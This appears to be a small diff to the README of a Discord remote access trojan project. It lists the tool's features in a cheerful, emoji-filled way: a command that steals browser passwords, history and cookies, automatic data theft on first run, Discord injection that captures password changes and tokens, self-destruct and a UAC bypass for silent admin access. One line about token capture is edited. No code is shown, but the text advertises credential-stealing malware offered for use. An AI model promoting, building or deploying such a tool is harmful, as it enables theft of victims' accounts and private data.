H-zz-H69/Discord-RAT/README.md

 - Plugin options to add custom features 🍕🍕
 - `!browser` – Steals passwords, history, cookies, and more 🦕🦖
 - On first-time startup, it automatically steals data ⚡
-- Discord injection to capture password changes via token 🗝
+- Discord injection to capture password changes and token 🗝
 - Self-destruct option that completely deletes itself after executing a command 💥
 - Get Discord account info using the `!token` command 🔑
 - Add UAC bypass to get admin access without a prompt 🔒